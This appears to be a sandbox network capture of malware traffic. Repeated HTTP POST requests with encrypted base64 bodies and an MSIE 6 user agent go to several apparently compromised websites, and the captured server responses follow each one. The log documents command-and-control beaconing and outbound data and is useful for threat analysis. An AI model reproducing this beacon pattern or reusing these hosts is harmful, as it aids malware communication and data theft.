...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W..

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: korta-sa.com
Connection: Keep-Alive
Cache-Control: no-cache

V89C8zv/ 3Zywioh0muvmyTZTIVBukMHn4TmKJnTdCREnEegYunAFGTRpqfEN78 5ZvL7/02j396DN1OSWlDvgeG5G/ PjBC6RfnhD7A3Sxoe3traDp/ZH7UqbO0cVJ3oikSHs0jxtS9OJNIBa5zraKNRX JqaZu xuaqRgjuN9gY1tjMIVnEaQb1aN9jeWZjnqyLuwApiMgn760kRJOkJ7s IlSNWFeKqaNrFS6dFgERKDaXIaH9e63FGakJbWnBbWjhSxM9MMPlouLaGpo2J2zuyyfgOgbuoWrMZzz4Yr19U8PHkNaAjusVswvUSzmb/VlLHTzTnVefxjE 3ztDwCEq9wFyruBw9ynNe5/hEcLCQ2HIbzm/k x6Ossa2QYsXB fm3UP1VZa08GARdCxtv/uvYDLxiAA5GaRFiQuCed0ffwukghaKCXmRU89ZJTsupBf6zn g==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 10:51:56 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 280
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<hr>.<address>A
pache/2.2.22 (Ubuntu) Server at korta-sa.com Port 80</address>.&
lt;/body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: unslp.edu.bo
Connection: Keep-Alive
Cache-Control: no-cache

tvnO8o48aW5RmMCnGZrFr/EonP2OqeiHomVWx BoOucNxWJMlciyE3hKjRuXWIfzHOGj4iVGmEqndgHF29Wo1PEw9Sf4pmJy1k221rM2B9MqEyGfvXn9Oo GjUIJFwP7jPqnnThwk9eII6XDE S24eI2HgPxiXCpEKxJfz6t1fykRZZ4OKkONTIhMAno3dCd8UscDe9vgjAVWfZf5dAQ3g0Vm6ibCIq0pC8XGmyTML3AxE2AuhsiqTe2p0Gb98gTOFKBdW6xgszlWnqbW3qcQoaQlP4kTGRETsEbzTfNybg2iZGr91e2/oGBCRPqu4ZljfasR5yBrMPeVjrob uxPhMbJ4gnriU2GTL4D4qHNwykBOTqiktKvS6h4RZUSzRLFeMTEUf MRu5A7UMgExE9PwA7P4TIwIle7kFCSEdWtJizX82y9Y20IUCK0g3SQGvnr6ZfVZBVtzn ttZ/CUH0GZ1porFM8EkMV5fc36jIUeGf3wrJ711kHX0evXA3fLMJBEIqtk=
HTTP/1.1 302 Found
Date: Sat, 01 Jul 2017 11:16:57 GMT
Server: Apache
Location: hXXps://unslp.edu.bo/401.shtml
Content-Length: 214
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXps://unslp.edu.bo/401.shtml">here</a>.</p>.<
;/body></html>.HTTP/1.1 302 Found..Date: Sat, 01 Jul 2017 11:
16:57 GMT..Server: Apache..Location: hXXps://unslp.edu.bo/401.shtml..C
ontent-Length: 214..Keep-Alive: timeout=2, max=500..Connection: Keep-A
live..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML P
UBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<tit
le>302 Found</title>.</head><body>.<h1>Foun
d</h1>.<p>The document has moved <a href="hXXps://unslp
.edu.bo/401.shtml">here</a>.</p>.</body></html
>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: urantiaproject.com
Connection: Keep-Alive
Cache-Control: no-cache

xJvICAtPTWekgq5XYljtAHRJKYlRDgUGb6FJr1pXqghm3a6om8FyWRpFnITNUMudn8zX4sVO0NN3o7mmyhSwnEP5UqQAr4k9U68NFLiJwLaLALBwYz5dQ4CZH7RhrtYpZa/qyzKnxnN5T iyEzcskKGJVUHczTYTXPZ4v9usMkoGe45ZJ7wqHbbxp3PN1/MMUFZEpxfBcyPmromXQytFsQYMScWSDz8u1UnThdRO4VCSnhMvMqM7GS8 y6COmWOy0RzcGHOC8Lzo4qHNSJve5pNcc3KUNo4MPbSVHVYp96UJeWLBQx2mjSLQgKaPzyVLLs4e2OXTE9amslycvjBphtIIL/bSNbwpTjPTxVsv7jJY9iziXHEMtsJ0J/pHRu9QNRLXrOBdHjEaRsMrhx55 aglv2CUcxA76/bigzl6XxMem9l99n3E1tMgqkWgrNJIPVutRuLpelyM7fNWwxQLEfrI49Tp eU5WOF/sca1wkGxik/JIJ30qlw5iqM0/b8bbubxMA==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:49 GMT
Server: Apache
Last-Modified: Fri, 17 Mar 2017 18:47:14 GMT
ETag: "cca00c1-63ac-54af19b311a9b"
Accept-Ranges: bytes
Content-Length: 25516
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<html>.<head>.<m
eta name="y_key" content="32a9d73c4d937b25" >.<title>Urantia
Book Project</title>.<meta name="Description" content="The pe
ople of Urantia have been gifted a revelation in book form that will b
ring us closer to Jesus and 'His' way.">.<meta name="Keywords" c
ontent="urantia, book, god, revelation, jesus, mary, universe, freedom
, guardian, angels,Tigran, Aivazian, bibles, uk, british, text, editio
n">.<meta http-equiv="Content-Language" content="en">.<met
a http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
;.<link href="mysite.ico" rel="shortcut icon" type="image/x-icon"&g
t;.<STYLE TYPE="text/css">.a {text-decoration:none; }..roll a h5
:hover { color:#F00;}.h1 { font-size: 19px; font-weight: bold; color:
#000; margin-bottom: 5px; font-family:"Times New Roman", Times, serif;
}.h2 { font-size: 30px; font-weight: bold; text-align: center; color:
#09F; margin-bottom: 5px; font-family:"Times New Roman", Times, serif
; }.h3 { font-size: 16px; font-weight: bold; text-align: center; color
: #000; margin-bottom: 5px; font-family:"Times New Roman", Times, ser
if; }.h4 { font-size: 35px; font-weight: bold; text-align: center; col
or: #09F; line-height:40px; margin-bottom: 5px; font-family:"Times New
Roman", Times, serif; }.h5 { font-size: 30px; font-weight: bold; text
-align: center; line-height: 25px; color: #09F; margin-bottom: 15p

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: upsilon89.com
Connection: Keep-Alive
Cache-Control: no-cache

tsXaseXAK3cMkoTgjP3fjl7OnHEzRhpw6ZMN39bkgCrTECXbAb2ALLDMmckb1v7cJjzOWvJzoW3yA91rCARXkxSSnL1nR5ph5SItz4gf91df5yyu9mJ2ok8xIluj QzR7UGvkCNfK9U5PyOG7NXalxbiUTMmRpYY BjyVuNBHmX8xTa0nRrqxMYteOBZIxiT/y9arssgZTuGuUZ8O1uyJUDMLTQQeGZQZLGDI9bEltdXjZXKDXIvZjTRWYWoOjv87U82YrRAQmjslepzI4qoY8eD3OKO9WaU3/XrwlbfM8lxI95LyD4VRUsYRoV4q2ARg1Px0WoJjl7kNlaho6Z5fDBM47ZQAp K6PiwGqAPuhLvniClQNo6HDN07kOKNfDNzqp8F4gXPMgUQAXGtg0rhN49cctrU2EYEHLHKR77QPZfjXES34eyzgBx68iUD b9z4WUIe8QbJCoIHcAH9nQ
HTTP/1.1 302 Moved Temporarily
Set-Cookie: 720planBAK=R3744882117; path=/; expires=Sat, 01-Jul-2017 12:27:08 GMT
Date: Sat, 01 Jul 2017 11:17:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: 720plan=R1791010726; path=/; expires=Sat, 01-Jul-2017 12:31:06 GMT
Server: Apache
X-Powered-By: PHP/5.4.45
Location: hXXp://VVV.upsilon89.com/wp
Vary: Accept-Encoding
X-IPLB-Instance: 5233
0..HTTP/1.1 302 Moved Temporarily..Set-Cookie: 720planBAK=R3744882117;
path=/; expires=Sat, 01-Jul-2017 12:27:08 GMT..Date: Sat, 01 Jul 2017
11:17:07 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Se
t-Cookie: 720plan=R1791010726; path=/; expires=Sat, 01-Jul-2017 12:31:
06 GMT..Server: Apache..X-Powered-By: PHP/5.4.45..Location: hXXp://www
.upsilon89.com/wp..Vary: Accept-Encoding..X-IPLB-Instance: 5233..0..font>....



GET /wp/ HTTP/1.1

Accept: */*
Accept-Language: en-us
Host: upsilon89.com
Cookie: 720planBAK=R3744882117; 720plan=R1791010726
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Set-Cookie: 720plan=R1791010726; path=/; expires=Sat, 01-Jul-2017 12:16:44 GMT
Date: Sat, 01 Jul 2017 11:17:08 GMT
Server: Apache
X-Powered-By: PHP/5.4.45
Link: <hXXp://upsilon89.com/wp/?rest_route=/>; rel="hXXps://api.w.org/"
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
X-IPLB-Instance: 5233
2000..<!DOCTYPE html>.<!--[if IE 6]>.<html id="ie6" lan
g="en-US">.<![endif]-->.<!--[if IE 7]>.<html id="ie7
" lang="en-US">.<![endif]-->.<!--[if IE 8]>.<html id
="ie8" lang="en-US">.<![endif]-->.<!--[if !(IE 6) & !(IE 7
) & !(IE 8)]><!-->.<html lang="en-US">.<!--<![end
if]-->.<head>.<meta charset="UTF-8" />.<meta name="v
iewport" content="width=device-width" />.<title>UPSILON | La
solution pour tous vos transports</title>.<link rel="profile"
href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet" type="t
ext/css" media="all" href="hXXp://upsilon89.com/wp/wp-content/themes/t
wentyeleven/style.css" />.<link rel="pingback" href="hXXp://upsi
lon89.com/wp/xmlrpc.php" />.<!--[if lt IE 9]>.<script src=
"hXXp://upsilon89.com/wp/wp-content/themes/twentyeleven/js/html5.js" t
ype="text/javascript"></script>.<![endif]-->.<link r
el='dns-prefetch' href='//s.w.org' />.<link rel="alternate" type
="application/rss xml" title="UPSILON » Feed" href="hXXp://upsil
on89.com/wp/?feed=rss2" />.<link rel="alternate" type="applicati
on/rss xml" title="UPSILON » Comments Feed" href="hXXp://upsilon
89.com/wp/?feed=comments-rss2" />...<script type="text/javascrip
t">....window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/ima
ges\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w
.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: capitalcitytuxedo.com
Connection: Keep-Alive
Cache-Control: no-cache

funeUvpHWnKqZM56nTccCz2Hd2tq93JTzgk4tuGNuzEGfpDMzRFoKwJX2u3Mb14Dyi48B7yOpi0hkxcoM //oQgR8XakIgEhHdGUmp9a e54h9owIL36ND yLLwsWRM1GQZdbdGh4bdgD6njrT2fLrjXol5T9ZtYH921t2i2pCLfQ5gHbP8YTsRi6eRm0YBEd GMI1l/YTM0AzdDpAKsdYG4f6HAuAx7GVCV8Qh7Hi71p/APjH3KfliRXiyt4R5mUY8RHViwcXKo3B2cAP2k/Bm8W84jagSxX9KeLwfPVylSQ yJtoMdCK7tWB1de5aWEv tGL lqSEiBaAaxej 8wMZUFZRSKgRrkdVZMEhWmCChWQ4GSdPIEAbLz2AhcvZ7N5jcl7z6VUFDzcBCwIdHd1wR2wh iFYn4xtWOlOy3RWIsENNGgYXtsRL4mAu NasqIu5Q==
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:02 GMT
Content-Type: text/html
Content-Length: 4961
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
X-Powered-By: PleskLin
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left:
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: capitalcitytuxedo.com
Connection: Keep-Alive
Cache-Control: no-cache

Qb7Ow2TjhH/0ZX W/1eM3Tc0ovEcUItu2P6xzAqmckv646Lng9e/tbZNxIOBnPPIxfJQuwcRASdz72c1enylr3VuhHFISdlp53Tz90I7M3UmjP4Bf0Cwn4/dd4PXWMknsKFFXDFAJyEr/tadnLWM/U3PxmS58T7bEexO5x24ALPHi8MLZZi1R6pE01zPtKkRSEd83SiTmSS2I4Pr7PEZGwPC5vHdhd1vpCk3VJ5xdGmI4tcWK55vvRVwnWKhTAjAt/hqDVbPk4LejCEuCx GHVyYKwPsMqcE0tByAa7C2samgJAHZuOd nM9eKX7H8bJ/ItpbyBlHLs6IO1yVHwe5pRmhbyKneASfyYDFVD3Scu16yoCmQGwfTgZg3HANJ1VWZMiLgVIAydg7Tk1LB sSduTHYw45viez45v1//h0H05BcsaX4Qsgurve1C6TMmXX70KztioLfVhqk/0YA==
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:17:17 GMT
Content-Type: text/html
Content-Length: 4961
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
X-Powered-By: PleskLin
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.or
g/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache
HTTP Server Test Page powered by CentOS</title>...<meta http-
equiv="Content-Type" content="text/html; charset=UTF-8" />...<st
yle type="text/css">....body {.....background-color: #fff;.....colo
r: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.
....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....
}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399
FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0
.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;....
.font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px so
lid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....
font-size: 1.1em;.....font-weight: bold;....}.....content {.....paddin
g: 1em 5em;....}.....content-columns {...../* Setting relative positio
ning allows for .....absolute positioning for sub-classes */.....posit
ion: relative;.....padding-top: 1em;....}.....content-column-left {...
../* Value for IE/Win; will be overwritten for other browsers */.....w
idth: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom:
2em;....}.....content-column-right {...../* Values for IE/Win; will b
e overwritten for other browsers */.....width: 47%;.....padding-left:
3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns
>.content-column-left, .content-columns>.content-column-righ

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tavdi.com
Connection: Keep-Alive
Cache-Control: no-cache

AI MImrNDmSsswRzTZ1hRi3eFxyawaqrPvbQg1f7UraVHlANu3AKyAPaW/h6UFaPzBGptYfc4kmQIZ uyYcze29tTzEd4qSrzxw9 igDflf6pjjxqzWS K8kLRd5eOnjM GEsBJ9aVwPrewLlbQiVYcQpM6T9FQHazVHizwoZo9ha7jw91GFEgICMcYKKuLM3NRBnrgLZgrQv2WnftgxmOWvwRAk6LrKyfU/O3HtVZyg9SiAh4a3CaA3NV7qtAtxyu/uYILm34B4XcU7DvculD05ET33Hoc5EkpOn6OGQR2zEeplmY6GBbGvJ9p5rsGCpgvRHpHiiriC9gZ9JAiLKP XD1Z7Hcw9btsMlGAX4gaOtEHEW4mGdWYFlRR7NBNhvE8wR0gBL2JFlPPSS70NtGYHR/OpBrqZV6uMBb/8HyRLB9CvLPINfsr23O8VeCXcKpeQrkNzXiUmtMeWTSp2 nrarOqVqvyTvq1hRflR4VMGFCGrjcFy
HTTP/1.1 408 Request Timeout
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 514
<html>Your request timed out.   Please retry the request.       






</html>..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 456
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: re-wakefield.co.uk
Connection: Keep-Alive
Cache-Control: no-cache

4fdXBqVV4l0m49ojTAoqjB79mSfzKe6EqRxwWxIDetk lTk ehDOt/Hn0TrrGfBjJa WNSa GjGHOu9KDVF8Thl858Hwo9f5gIcLseEBjssTPYT9JoCZ8v rQZJz3yj8M Xg0XaonMbGJuRtkGgQjq/ipkqx92r3iI4dpo5cvMEwkvDQ6V75sV1YCs2YmSqm7cnFUVgt9R8VCfXjaANrOQcp3VGNUjnzh6mkjmlTa13cd/5G5RdrCPcjr1bx6ezlcSZlqPuapnE/Rp8aGIsNp7z8YWZ CboW0snkaPcxYfZ3cy/AVczuu7fvYbezhHhmi BksEz8pS2oBGra9cRMr h5PciUJ7KMNFVe2pRJvP0uxeA8FEPS0MQrBfGC6XdiSffYr4JykTjIO1g5kAm2r2tP/uvnYEjM6Phi6EIE GgVWnAp 0HO2P0go9OQugqxD2mHqyo=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=db2deae4626096d7852b1f498d10385521498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.re-wakefield.co.uk; HttpOnly
Cache-Control: max-age=2
Expires: Sat, 01 Jul 2017 11:16:40 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f449e33b823d-KBP
159e..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rodeoshow.com.au
Connection: Keep-Alive
Cache-Control: no-cache

qJWYak 5GWlZxQT07tZJ61jgK4rlj4nX8zUYxkagsNAUSbLcxvLwU3dtkKD/gi4Mra0bLHZow/xdmF20DyFqCF1jm4OQe3E6dSDyz2NBQEHvTM6dkc354T2SJXjrLJ2ZdBSthrlI1QUxu06 l XHTDi twzDzS6UFHORvtXPR21fBqAgw JKdusWy3VyinwU6k7vPTpAReuJN21zQdGiGQWnxOU2r07zrVojK fM04SGMmbOyPaSASLGTuloH2WHEkFOI9xjXzxMGMcQo2cuJ7gAjy1HephVggIQ9InBxrqh81aPZo345KhlnsY9vXdmbt1bCyx zeLCrVme80CfiFLWF7Ief4FotuyOpKEF7p1C4FGiBsLjqP9ZU5URZl8UW7orDiIcNr6EQGpxvoBJunwYJjhE phJl4jQz22aXn7BgaqxYvugwr2A5UIz10EtLAsSkTMZiGKU8Ua7yxQCeE938Gq Bvo=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:51 GMT
Server: Apache
Set-Cookie: frontend=h1l24nmj8tegjo8772tiropqn6; expires=Sat, 01-Jul-2017 12:16:51 GMT; Max-Age=3600; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
P3p: CP="CAO PSA OUR"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2000..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="ht
tp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>..
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
/>.<title>Women's Boutique Clothing & Fashion Online - Ro
deo Show</title>..<meta name="viewport" content="width=device
-width, initial-scale=1, maximum-scale=1" />.<meta name="descrip
tion" content="Renowned for their signature look that fuses bohemian c
harm with a fashion-forward edge, each Rodeo Show collection exudes an
acutely wearable appeal.Rodeo Show have maintained a consistent prese
nce in the market carving out a niche that sees their beautifully desi
gned and produced garments sit well above the high street market, with
out the price tags of high-end designer labels." />.<meta name="
keywords" content="Rodeo Show" />.<meta name="robots" content="I
NDEX,FOLLOW" />.<link rel="icon" href="hXXp://VVV.rodeoshow.com.
au/media/favicon/default/rsfavicon.gif" type="image/x-icon" />.<
link rel="shortcut icon" href="hXXp://VVV.rodeoshow.com.au/media/favic
on/default/rsfavicon.gif" type="image/x-icon" />.<!--[if lt IE 7
]>.<script type="text/javascript">..//<![CDATA[. var BL
ANK_URL = 'hXXp://VVV.rodeoshow.com.au/js/blank.html';. var BLANK_I
MG = 'hXXp://VVV.rodeoshow.com.au/js/spacer.gif';.//]]>.</script
>.<![endif]-->..<link rel="stylesheet" type="text/css"

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 452
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: digpro.se
Connection: Keep-Alive
Cache-Control: no-cache

S521TCj 010tZBgP68teSZtTWZgwHIWH3PtKo7Sp13hqCJx59ad/QmhCzOCWztqAg6Q4jtlF1PDgnhpUKP9hsZHKoiafMUf/JIkX9BI8Qh jmYZdxe0nvFkGj/SFJXQl/qQo1mMxPIl0RhEBWOS6j20eRkCE0neLF/o6ejkbzN3cqKRO9jh3UqqVpGhculsf4ChylMdTMM3oP2W7EV/0ulJXOE8hPWT1t30MbHBR41yEia aPxRG91HnZtVh9Mcxq62L5mq/gnHyoDCBb087nhrAGr7PjOgvEQZBLA1 OsJPDVIFkquiy4k8PlxWsMpMnrZIT5bZaBweCKBLRX9E0Mde2YFnHAOdSkV43O06z0tggbYrYtM1S5lHNqq0DucmBrAbn8uugDd49O/HupDQcwGa6fVgDtvGGXnHAfZt8Uu6QOg 4/JbFWSC5o6yREmruFRP
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Set-Cookie: 21cea88db578ea10d566968fb541f3c9=1d861fbda732ca26cc76424eb5aac8dc; path=/; HttpOnly
Set-Cookie: bc228a21cdb7a5bf8efa0c4ab479777b=en-GB; expires=Sun, 01-Jul-2018 11:16:38 GMT; Max-Age=31536000; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Sat, 01 Jul 2017 11:16:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
910..<!DOCTYPE HTML>.<html lang="en-gb" dir="ltr">..<he
ad>..<title>browser - Please update to a modern browser</t
itle>..<link rel="stylesheet" href="/templates/yoo_nano2/css/bas
e.css" />..<link rel="stylesheet" href="/templates/yoo_nano2/css
/error.css" />..<!--[if IE 6]><style>body{height:100%;w
idth:100%}.error,..error.span{zoom:1}.error-browser..error{font-size:2
0px;line-height:inherit}.error-browser .error.a{-pie-png-fix:true;beha
vior:url("/templates/yoo_nano2/warp/js/css3pie.htc")}</style><
;![endif]-->...<script type="text/javascript">.var _gaq = _ga
q || [];_gaq.push(['_setAccount', 'UA-26676660-1']);_gaq.push(['_track
Pageview']);(function() {var ga = document.createElement('script');
ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == d
ocument.location.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-a
nalytics.com/ga.js';var s = document.getElementsByTagName('script')[0]
; s.parentNode.insertBefore(ga, s);})();.(function(i,s,o,g,r,a,m){i['G
oogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).pus
h(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElements
ByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(win
dow,document,'script','//VVV.google-analytics.com/analytics.js','_pixG
Analytics');_pixGAnalytics('create', 'UA-26676660-1', {cookieDomain: '
digpro.se'});_pixGAnalytics('send', 'pageview');..</script>..<
;/head>..<body id="page" class="page">...<div class="c

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache

